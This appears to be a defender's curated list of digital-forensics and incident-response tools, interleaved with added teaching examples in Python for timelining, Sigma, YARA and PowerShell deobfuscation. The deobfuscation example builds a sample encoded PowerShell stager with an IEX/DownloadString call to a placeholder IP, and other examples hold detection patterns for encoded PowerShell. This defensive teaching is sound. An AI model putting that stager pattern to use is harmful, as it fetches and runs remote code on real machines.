Powerful Tools

In cybersecurity and digital forensics, having the right set of tools is essential to analyze, detect, and respond to threats effectively. Throughout my career, I have relied on a variety of powerful tools to perform these analyses.

Below, I’ve compiled a list of tools, organized by DFIR phase. This list is not intended to present the best or most powerful tools, nor all the tools available on the Internet, but rather tools that have sparked my interest as part of my blue team activities. Everyone is free to use the tools they prefer; the important thing is to be familiar with them.

Acquisition

  • KAPE (Kroll Artifact Parser and Extractor)
    KAPE is a triage collection and parsing tool widely used for first-response data acquisition on Windows systems. It collects key forensic artifacts such as registry hives, event logs, MFT, Prefetch, and browser data in minutes, and can chain modules to parse them automatically using Eric Zimmerman’s tools. It is particularly useful when you need fast situational awareness without imaging the full disk.
    https://www.kroll.com/en/services/cyber-risk/incident-response-litigation-support/kroll-artifact-parser-extractor-kape

  • UAC (Unix-like Artifacts Collector)
    UAC is a live response collection script for Unix-like systems, including Linux, macOS, BSD, ESXi, AIX, and Solaris. It automates the collection of forensic artifacts and system information based on configurable profiles, producing a structured archive ready for analysis. It is particularly useful when KAPE is not applicable, such as on non-Windows hosts.
    https://github.com/tclahr/uac

  • FTK Imager
    FTK Imager is a free disk imaging and preview tool from Exterro (formerly AccessData). It creates forensic images in raw (dd), E01, SMART or AFF format with hash verification, mounts images read-only for inspection, lets you browse file systems and export files (including deleted entries the file system still references), and can capture live memory on Windows. It complements triage collectors such as KAPE and DFIR-ORC when a full, verifiable image of a disk or volume is required rather than a quick artifact collection.
    https://www.exterro.com/digital-forensics-software/ftk-imager

  • AVML (Acquire Volatile Memory for Linux)
    AVML is a Microsoft tool for acquiring physical memory from Linux systems. It is distributed as a static binary with no kernel-mode dependencies, which makes it usable across a wide range of Linux distributions and kernel versions without prior preparation. It is particularly useful when memory acquisition needs to happen quickly on systems where compiling a kernel module is not an option.
    https://github.com/microsoft/avml

  • DFIR-ORC
    DFIR ORC (Outil de Recherche de Compromission) is ANSSI's modular artifact collection tool for Windows. It ships as a single self-contained binary driven by an XML configuration, embeds its own collectors (GetThis for file collection, NTFSInfo, USNInfo, FastFind for IOC searches) and can wrap third-party tools, writing everything into archives ready for analysis. It is built for reliable, reproducible acquisition across many hosts during an incident.
    https://github.com/DFIR-ORC/dfir-orc

  • DFIR-OGRE
    DFIR-OGRE is a command-line utility from ANSSI that extracts Windows forensic artifacts from DFIR-ORC archives. It uses a plug-in architecture to parse a wide range of artifacts such as LNK files, browser history, NTFS metadata, USN journal entries, AmCache, Prefetch, scheduled tasks, and EVTX logs. It outputs structured data that can be ingested into Splunk, Elastic, or other analysis platforms, and serves as a direct companion to DFIR-ORC.
    https://github.com/ANSSI-FR/dfir-ogre

Disk & File System Analysis

  • Eric Zimmerman’s Tools
    Eric Zimmerman’s tools are a collection of free utilities, mostly command-line with a few GUI viewers, for parsing core Windows forensic artifacts. They include MFTECmd (MFT and USN journal), EvtxECmd (event logs to CSV/JSON), AppCompatCacheParser and AmcacheParser (execution evidence), RECmd and Registry Explorer (registry hives), PECmd (Prefetch) and LECmd (LNK files). Their CSV output loads directly into Timeline Explorer, making this toolkit a reference for Windows DFIR.
    https://ericzimmerman.github.io/

  • The Sleuth Kit (TSK)
    The Sleuth Kit is the command-line foundation that Autopsy builds on. It provides tools such as mmls (partition layout), fls (file listing, including deleted entries), icat (extract a file by inode), istat (inode metadata) and mactime (timeline from a body file) for scriptable, low-level access to a file system. It is particularly useful when you need to recover deleted entries from file system metadata or build a body file (for example with fls -r -m / image.dd) to feed mactime for timelining.
    https://www.sleuthkit.org/sleuthkit/

  • Autopsy
    Autopsy is the graphical digital forensics platform built on The Sleuth Kit. It adds case management and ingest modules (hash lookup, keyword search, web artifacts, a timeline view) on top of TSK’s file system parsing, and lets you browse disks and partitions, examine file systems and recover deleted data without using the command line.
    https://www.autopsy.com/
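
To make the body-file and mactime workflow above concrete, here is an added example (my own illustration, not code from The Sleuth Kit or Autopsy) that parses a small constructed body file in the format fls -m produces and merges it into a mactime-style MACB timeline. The file names, inodes and timestamps are invented.

```python
"""Build a mactime-style timeline from a Sleuth Kit body file.

Added example, not part of the original page or of The Sleuth Kit itself.
The body lines below are constructed sample data in the TSK 3.x body-file
format that `fls -m` / `ils -m` emit:
    MD5|name|inode|mode_as_string|UID|GID|size|atime|mtime|ctime|crtime
Timestamps are Unix epoch seconds; 0 means "not set".
"""
from datetime import datetime, timezone

# Constructed sample body file (not real evidence).  The first entry is a
# deleted file, which fls marks with "(deleted)" in the name column.
SAMPLE_BODY = """\
0|/Users/bob/Downloads/invoice.pdf.exe (deleted)|1234-128-4|r/rrwxrwxrwx|0|0|51200|1700000300|1700000100|1700000100|1700000000
0|/Windows/Prefetch/INVOICE.PDF.EXE-1A2B3C4D.pf|5678-128-1|r/rrwxrwxrwx|0|0|8192|1700000150|1700000150|1700000150|1700000150
0|/Users/bob/AppData/Roaming/svc.dll|9012-128-3|r/rrwxrwxrwx|0|0|204800|1700000200|1700000200|1700000250|1700000200
"""

# Column index of each timestamp and the MACB letter it maps to.
TIME_COLUMNS = ((7, "a"), (8, "m"), (9, "c"), (10, "b"))


def parse_body(text):
    """Parse body-file text into a list of dicts, one per line."""
    rows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split("|")
        if len(parts) != 11:
            raise ValueError(f"malformed body line: {line!r}")
        rows.append({
            "name": parts[1],
            "inode": parts[2],
            "mode": parts[3],
            "size": int(parts[6]),
            "times": {letter: int(parts[idx]) for idx, letter in TIME_COLUMNS},
        })
    return rows


def build_timeline(rows):
    """Expand each row into events and merge events sharing a timestamp.

    Like mactime, a file whose m, c and b times are identical appears once
    with "m.cb"; timestamps of 0 are skipped.  Returns (ts, macb, name)
    tuples sorted chronologically.
    """
    merged = {}
    for row in rows:
        for letter, ts in row["times"].items():
            if ts == 0:
                continue
            merged.setdefault((ts, row["name"]), set()).add(letter)
    timeline = []
    for (ts, name), letters in sorted(merged.items()):
        macb = "".join(l if l in letters else "." for l in "macb")
        timeline.append((ts, macb, name))
    return timeline


def deleted_entries(rows):
    """Names fls flagged as deleted: candidates for recovery with icat."""
    return [r["name"] for r in rows if "(deleted)" in r["name"]]


def format_timeline(timeline):
    """Render the timeline in a mactime-like text layout (UTC)."""
    lines = []
    for ts, macb, name in timeline:
        when = datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S")
        lines.append(f"{when} {macb} {name}")
    return "\n".join(lines)


if __name__ == "__main__":
    rows = parse_body(SAMPLE_BODY)
    print(format_timeline(build_timeline(rows)))
    print("deleted:", deleted_entries(rows))
```

Reading the output: the deleted executable was created (b) before it was modified and changed (m.c.), the Prefetch file appeared with all four timestamps equal (macb) shortly after, and the DLL's metadata change (..c.) came after its content was written. This is the same reasoning mactime output supports, here on invented data.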

Memory Analysis

  • Volatility
    Volatility is the reference open-source framework for extracting artifacts (processes, loaded modules, handles, network connections, injected code, registry hives) from the memory of a compromised system. Volatility 3, written for Python 3, is the actively maintained version and should be the default choice; Volatility 2, which requires Python 2, is no longer developed but is still encountered because some community plugins were never ported. One practical caveat: for Linux and macOS images Volatility 3 needs a symbol table (ISF) matching the exact kernel build, whereas Windows symbols are fetched automatically. It may feel complex at first, but it becomes an invaluable tool with experience.
    https://volatilityfoundation.org/

  • MemProcFS
    MemProcFS is a memory analysis tool that mounts a memory image (or live system memory) as a virtual file system. It exposes processes, handles, registry, network artifacts, and YARA scan results as browsable files and folders. It is easier to approach than Volatility’s plugin-based workflow and serves as a useful companion for fast memory triage.
    https://github.com/ufrisk/MemProcFS

  • PyDFIR
    PyDFIR is a framework primarily based on Volatility. It is expected to expand with additional network functionalities in the near future.
    https://github.com/PyDFIR

Timeline & Event Log Analysis

  • Timeline Explorer
    Timeline Explorer is a free grid viewer for CSV (and Excel) files, built for the output of Eric Zimmerman’s parsers such as EvtxECmd and MFTECmd. It handles very large files and offers column filtering, grouping, conditional coloring and a search across all columns, which makes it the usual front end for reviewing MFT (Master File Table) and EVTX (Windows Event Log) parsing results over time. Eric Zimmerman’s tools, including Timeline Explorer, are highly regarded in the forensic community.
    https://ericzimmerman.github.io/#!index.md

  • Plaso / log2timeline
    Plaso is a Python-based super-timeline engine, with log2timeline.py as its primary frontend used to build a unified chronological view across hundreds of artifact types. It also provides pinfo and psort to inspect, filter, and export the resulting timeline. It is useful when you need broad temporal context across an investigation rather than a focused triage timeline.
    https://plaso.readthedocs.io/

  • APT-Hunter
    APT-Hunter parses Windows event logs (EVTX) and applies its built-in detection logic to flag known attacker techniques across Security, System, PowerShell, Sysmon and other logs. It produces an Excel report and CSV timelines that load directly into Timeline Explorer, which makes it a quick first pass over a set of logs before manual review.
    https://github.com/ahmedkhlief/APT-Hunter

  • Hayabusa
    Hayabusa, from Yamato Security, is a Rust-based Windows event log timeline generator and threat hunting tool. Like APT-Hunter it works on EVTX files, but its detection is driven by Sigma rules (plus its own rule set), and it outputs a CSV/JSON timeline with severity levels that loads directly into Timeline Explorer. Note: Chainsaw is a popular alternative in the same space, also Sigma-driven.
    https://github.com/Yamato-Security/hayabusa

Threat Hunting & IR at Scale

  • Velociraptor
    Velociraptor is an open-source endpoint visibility and incident response platform. A server manages agents (or standalone offline collectors), and artifacts written in its query language, VQL, define what to collect or hunt for, from KAPE-style triage packages to YARA scans, across thousands of hosts at once. Results are stored centrally and can be exported for analysis.
    https://docs.velociraptor.app/

  • Kansa
    Kansa is a PowerShell-based incident response framework for distributed collection of artifacts across an enterprise. It is lightweight and scriptable, and complements Velociraptor when you need rapid, ad-hoc collection. It is particularly relevant in Windows-only environments.
    https://github.com/davehull/Kansa

  • Wireshark
    Wireshark is a network protocol analyzer used to capture and examine traffic passing through a network in real time, or to dissect saved packet captures. It is essential for detailed analysis of network communications and for diagnosing performance and security issues.
    https://www.wireshark.org/

  • Elastic/OpenSearch
    Elastic (Elasticsearch with Kibana) and OpenSearch (the fork of Elasticsearch 7.10, originally created by Amazon and now governed by the OpenSearch Software Foundation) are search and analytics platforms that serve as the core of a SIEM (Security Information and Event Management). They are particularly useful for incident detection rather than forensic analysis: Elastic ships a Security app with detection rules, and OpenSearch offers a Security Analytics plugin. Both are highly effective in environments with large volumes of logs; queries are written in KQL (Kibana Query Language) on the Elastic side and in DQL or PPL in OpenSearch Dashboards. Note that Elastic is source-available under its own licenses while OpenSearch is Apache 2.0 licensed, which is one reason OpenSearch is a recommended option for those looking to self-host one of these solutions.
    https://www.elastic.co/
    https://opensearch.org/

Rules & Detection Languages

  • Sigma
    Sigma is a generic, open signature format for SIEM rules. A Sigma rule can be converted into backend-specific queries for platforms such as Splunk, Elastic, or Sentinel, allowing detection content to be shared and ported across detection stacks. The community rule repository provides a useful baseline for blue teams.
    https://github.com/SigmaHQ/sigma

  • YARA
    YARA is a pattern-matching tool and rule language designed to identify and classify malware based on textual or binary patterns (plain strings, hex sequences with wildcards and jumps, regular expressions) combined into a boolean condition. Rules can be applied to files, memory images, or running processes. YARA is embedded in many other tools, such as MemProcFS, Velociraptor and various sandboxes, making it the standard for malware signaturing.
    https://virustotal.github.io/yara/
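
As an added example of what a Sigma rule expresses (my own illustration, not code from the SigmaHQ project; real conversion to backend queries is done with sigma-cli/pySigma), the following evaluates a constructed rule, written as the Python equivalent of its YAML, against constructed process-creation events. The rule, the allowlisted parent process and the events are all invented.

```python
"""Evaluate a Sigma-style rule against sample events.

Added example, not part of the original page or of the SigmaHQ project.
It only illustrates the rule semantics: named selections of field/value
pairs (AND within a selection), value modifiers (|contains, |startswith,
|endswith), lists as OR, case-insensitive matching, and a boolean condition
over the named selections.
"""
import re

# Python equivalent of a Sigma YAML rule; constructed, not from SigmaHQ.
RULE = {
    "title": "Encoded PowerShell command line",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
            "CommandLine|contains": ["-enc", "-EncodedCommand"],
        },
        "filter": {
            # constructed allowlist: a management agent that legitimately
            # launches encoded PowerShell
            "ParentImage|endswith": "\\sccm_agent.exe",
        },
        "condition": "selection and not filter",
    },
    "level": "medium",
}

# Constructed events shaped like normalised Sysmon Event ID 1 fields.
EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgA...",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": "pwsh.exe -File C:\\scripts\\backup.ps1",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -EncodedCommand VwBy...",
     "ParentImage": r"C:\Program Files\SCCM\sccm_agent.exe"},
]


def _value_matches(actual, expected, modifier):
    """Sigma string matching is case-insensitive; a list of values is OR-ed."""
    if isinstance(expected, list):
        return any(_value_matches(actual, e, modifier) for e in expected)
    a, e = str(actual).lower(), str(expected).lower()
    if modifier is None:
        return a == e
    if modifier == "contains":
        return e in a
    if modifier == "startswith":
        return a.startswith(e)
    if modifier == "endswith":
        return a.endswith(e)
    raise ValueError(f"unsupported modifier: {modifier}")


def selection_matches(selection, event):
    """Every field/value pair in a selection must match (AND)."""
    for key, expected in selection.items():
        field, _, modifier = key.partition("|")
        if field not in event:
            return False
        if not _value_matches(event[field], expected, modifier or None):
            return False
    return True


def rule_matches(rule, event):
    """Evaluate the condition over the named selections.

    Only identifiers joined by and/or/not are supported; constructs such as
    "1 of selection*" are out of scope for this illustration.
    """
    detection = rule["detection"]
    names = {k: selection_matches(v, event)
             for k, v in detection.items() if k != "condition"}
    expr = re.sub(
        r"\b(\w+)\b",
        lambda m: m.group(1) if m.group(1) in ("and", "or", "not")
        else repr(names[m.group(1)]),
        detection["condition"],
    )
    return bool(eval(expr, {"__builtins__": {}}, {}))


def matching_events(rule, events):
    return [e for e in events if rule_matches(rule, e)]


if __name__ == "__main__":
    for e in matching_events(RULE, EVENTS):
        print(RULE["title"], "->", e["CommandLine"])
```

Only the first event fires: the second is a plain script run, and the third is encoded PowerShell but excluded by the filter selection, which is exactly how a Sigma "selection and not filter" rule encodes a known-good exception without loosening the detection itself.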
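
As an added illustration of YARA's hex-string syntax (my own code, not part of the YARA project; real scanning uses the yara binary or yara-python), the following translates hex strings with ?? wildcards and [n-m] jumps into byte regexes and scans two constructed buffers. The patterns and buffers are invented and are not real signatures or real malware.

```python
"""Translate YARA hex strings into byte regexes and scan buffers with them.

Added example (not code from the original page or from the YARA project).
The strings and sample buffers are constructed for illustration only.
"""
import re

# A cut-down rule in YARA's hex-string syntax.  Supported here: literal bytes,
# "??" single-byte wildcards and bounded jumps "[n-m]" / "[n]".  Real YARA also
# has nibble wildcards (4?), alternatives ( A | B ) and unbounded jumps [-].
RULE_STRINGS = {
    # MZ header followed, within 256 bytes, by the PE signature
    "$pe_header": "{ 4D 5A [0-256] 50 45 00 00 }",
    # xor byte ptr [reg+reg], imm8 ; 1-4 bytes of loop bookkeeping ; jnz
    "$xor_decode": "{ 80 34 ?? ?? [1-4] 75 }",
}

# Constructed sample buffers (not real files).
SAMPLE_PE = (b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 16
             + b"\x80\x34\x08\x41\x40\x75\xf9")
SAMPLE_TEXT = b"just a text file with PE\x00\x00 inside but no MZ header"

_TOKEN = re.compile(r"\?\?|[0-9A-Fa-f]{2}|\[(\d+)(?:-(\d+))?\]")


def hex_string_to_regex(hex_string):
    """Compile a YARA hex string into a `re` pattern over bytes."""
    body = hex_string.strip()
    if not (body.startswith("{") and body.endswith("}")):
        raise ValueError("hex string must be enclosed in { }")
    body = body[1:-1]
    pattern = b""
    pos = 0
    for tok in _TOKEN.finditer(body):
        if body[pos:tok.start()].strip():
            raise ValueError(f"unexpected text in hex string: {body[pos:tok.start()]!r}")
        pos = tok.end()
        text = tok.group(0)
        if text == "??":
            pattern += b"."                                  # any single byte
        elif text.startswith("["):
            lo = tok.group(1)
            hi = tok.group(2) or lo                          # "[n]" is a fixed jump
            pattern += b".{%d,%d}" % (int(lo), int(hi))
        else:
            pattern += re.escape(bytes.fromhex(text))        # literal byte
    if body[pos:].strip():
        raise ValueError(f"unexpected text in hex string: {body[pos:]!r}")
    # DOTALL so "." also matches 0x0A; YARA has no notion of lines.
    return re.compile(pattern, re.DOTALL)


def scan(strings, data):
    """Return {identifier: [offsets]} for every string with at least one hit.

    finditer reports non-overlapping matches, whereas YARA reports every
    occurrence; for signature triage the difference rarely matters.
    """
    hits = {}
    for ident, hex_string in strings.items():
        offsets = [m.start() for m in hex_string_to_regex(hex_string).finditer(data)]
        if offsets:
            hits[ident] = offsets
    return hits


def n_of_them(strings, data, n):
    """YARA condition 'n of them': at least n distinct strings matched."""
    return len(scan(strings, data)) >= n


if __name__ == "__main__":
    print("sample_pe:", scan(RULE_STRINGS, SAMPLE_PE),
          "2 of them:", n_of_them(RULE_STRINGS, SAMPLE_PE, 2))
    print("sample_text:", scan(RULE_STRINGS, SAMPLE_TEXT))
```

The text buffer contains both "MZ" and "PE\0\0" but in the wrong order, so the jump-based pattern correctly does not fire; this is the kind of ordering constraint that a plain substring search cannot express and that makes hex strings with jumps useful for header and code-pattern signatures.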

Malware Analysis

  • Exalyze
    Exalyze is a cloud-based malware analysis platform designed to accelerate static analysis of suspicious files. It can disassemble and inspect binaries within seconds, automating tedious tasks (like extracting interesting API-call sequences) to give analysts a quick overview of capabilities. Exalyze also offers one-click YARA rule generation and a similarity search engine to find related malware samples from a large database, greatly streamlining threat research and hunting.
    https://exalyze.io/

  • Dogbolt
    Dogbolt is an interactive online decompiler service that produces decompiled C-like output from binaries using many popular decompilers in parallel. Essentially the reverse of the Compiler Explorer, it lets you upload a program and compare how tools like Ghidra, IDA Pro’s Hex-Rays, Binary Ninja, and others reconstruct the code. This helps reverse engineers and malware analysts quickly see different decompiler interpretations side-by-side for deeper static analysis.
    https://dogbolt.org/

  • Capa
    Capa is a static analysis tool from Mandiant’s FLARE team that automatically identifies the capabilities of an executable, such as network communication, persistence, code injection, or anti-analysis techniques. It uses a community-maintained rule set and produces a readable summary of what a sample is likely to do, helping to accelerate triage before deeper reverse engineering.
    https://github.com/mandiant/capa

  • CyberChef
    CyberChef is a web-based tool for data manipulation that supports encoding/decoding, encryption, compression, hashing, parsing, and many more operations chained as “recipes”. It is particularly useful when dealing with obfuscated PowerShell, encoded payloads, or any artifact requiring quick decoding during analysis.
    https://gchq.github.io/CyberChef/

  • Joe Sandbox
    Joe Sandbox is a malware analysis platform that executes suspicious files in an isolated environment to observe their behavior. It generates detailed reports on the activities of the malware, aiding in threat detection and analysis.
    https://www.joesandbox.com/

  • Cuckoo Sandbox
    Cuckoo3 is a modern, Python 3–based rewrite of Cuckoo Sandbox that provides a self-hosted alternative to commercial solutions like Joe Sandbox. Actively developed and open source, it focuses on automated dynamic malware analysis in isolated Windows environments.
    https://github.com/cert-ee/cuckoo3

  • Drakvuf Sandbox
    DRAKVUF Sandbox is an open-source, self-hosted, hypervisor-level malware sandbox built on the DRAKVUF introspection engine. It provides automated, agentless dynamic malware analysis via a web interface for submitting suspicious files and exploring detailed behavioral reports.
    https://github.com/CERT-Polska/drakvuf-sandbox
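
The obfuscated-PowerShell case mentioned under CyberChef, as an added example (my own code, not CyberChef's): peel the -EncodedCommand layer and the inner base64/gzip stage the way a chained CyberChef recipe would. The command line is constructed in-block, and the host 198.51.100.7 is from the RFC 5737 documentation range, not a real server.

```python
"""Peel layered encodings from a PowerShell command line, recipe-style.

Added example (not code from the original page or from CyberChef).  The
sample command line is constructed in this file; 198.51.100.7 is from the
RFC 5737 documentation range and is not a real C2.
"""
import base64
import gzip
import re

# --- constructed sample ----------------------------------------------------
INNER_SCRIPT = ("$c = New-Object Net.WebClient; "
                "$c.DownloadString('http://198.51.100.7/a')")

# Common stager shape: the inner script is gzip-compressed, base64-encoded and
# inflated at runtime with GzipStream before being handed to IEX.
STAGE2 = (
    "IEX (New-Object IO.StreamReader((New-Object IO.Compression.GzipStream("
    "[IO.MemoryStream][Convert]::FromBase64String('"
    + base64.b64encode(gzip.compress(INNER_SCRIPT.encode())).decode()
    + "'),[IO.Compression.CompressionMode]::Decompress)),"
    "[Text.Encoding]::ASCII)).ReadToEnd()"
)


def encode_command(script):
    """Build the argument powershell.exe -EncodedCommand expects: UTF-16LE, base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


SAMPLE_CMDLINE = "powershell.exe -nop -w hidden -enc " + encode_command(STAGE2)
# ---------------------------------------------------------------------------

_ENC_ARG = re.compile(r"(?:-e|-ec|-enc|-encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
_INNER_B64 = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)
GZIP_MAGIC = b"\x1f\x8b"


def _bytes_to_text(blob):
    """PowerShell payloads are usually UTF-16LE (NUL in every odd byte) or ASCII/UTF-8."""
    if len(blob) >= 2 and all(b == 0 for b in blob[1::2]):
        return blob.decode("utf-16-le")
    return blob.decode("utf-8", errors="replace")


def decode_encoded_command(cmdline):
    """Step 1: find -enc/-EncodedCommand and decode it (base64, then UTF-16LE)."""
    m = _ENC_ARG.search(cmdline)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def unwrap(script, max_depth=8):
    """Steps 2..n: while the script embeds FromBase64String('...'), decode it,
    gunzip if the blob starts with the gzip magic, and continue with the
    result.  Returns every layer, outermost first, so the full chain is visible."""
    layers = [script]
    for _ in range(max_depth):
        m = _INNER_B64.search(layers[-1])
        if not m:
            break
        blob = base64.b64decode(m.group(1))
        if blob.startswith(GZIP_MAGIC):
            blob = gzip.decompress(blob)
        layers.append(_bytes_to_text(blob))
    return layers


def deobfuscate(cmdline):
    """Full recipe: returns the list of layers, or None if nothing was encoded."""
    script = decode_encoded_command(cmdline)
    return None if script is None else unwrap(script)


if __name__ == "__main__":
    for i, layer in enumerate(deobfuscate(SAMPLE_CMDLINE)):
        print(f"layer {i}: {layer[:80]}")
```

The max_depth guard matters in practice: some loaders nest a dozen layers or reference themselves, and an unbounded loop on analyst tooling is an easy way to lose time on a triage box.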

Threat Intelligence (Online Lookups)

  • FARELO (Fast Reputation Lookup)
    FARELO is an online threat intelligence aggregator for quick reputation checks. It allows analysts to query an IP address, domain, CVE, or file hash and retrieves real-time threat data from multiple sources in one place. By combining results from various threat intel databases, FARELO provides a convenient snapshot of malicious indicators associated with the queried entity, saving time in investigations.
    https://farelo.nawhack.fr/

  • VirusTotal
    VirusTotal is the de facto service for checking files, URLs, domains and IP addresses against dozens of antivirus engines and URL scanners, enriched with sandbox reports and relationships between indicators. Search by hash before uploading: submitted files are shared with the security community and AV vendors, so never upload documents that may contain confidential data.
    https://www.virustotal.com/gui/home/upload

  • URLScan
    URLScan (urlscan.io) visits a submitted URL in a headless browser and records the resulting page, screenshot, HTTP requests, and contacted domains and IPs, which lets you analyze a phishing page without touching it from your own network. Scans are public by default; use an unlisted or private scan when the URL itself is sensitive, for example a phishing link that embeds a victim’s e-mail address.
    https://urlscan.io/

  • OpenCTI
    OpenCTI (Open Cyber Threat Intelligence) is an open-source platform that facilitates the management and sharing of cyber threat intelligence. It helps to centralize, structure, and analyze threat information to improve organizational cybersecurity.
    https://github.com/OpenCTI-Platform/opencti

Virtual Machines / Bundles of Tools

  • SIFT Workstation
    SIFT Workstation is an open-source Linux distribution pre-configured with forensic and incident response tools, such as Volatility and Sleuth Kit. It is designed to be a comprehensive digital forensic environment.
    https://www.sans.org/tools/sift-workstation/

  • REMnux
    REMnux is a Linux distribution specialized in reverse engineering. It includes a collection of tools for malware analysis, network traffic analysis, and digital forensic investigations.
    https://remnux.org/

  • Flare VM
    FLARE VM is Mandiant’s PowerShell-based installer that turns a clean Windows VM into a reverse-engineering and malware analysis environment (debuggers, disassemblers, PE tools, network utilities) using Chocolatey packages. It serves as the Windows counterpart to SIFT Workstation and REMnux.
    https://github.com/mandiant/flare-vm

This list will evolve over time. I hope it will help you as much as it has helped me in the past.
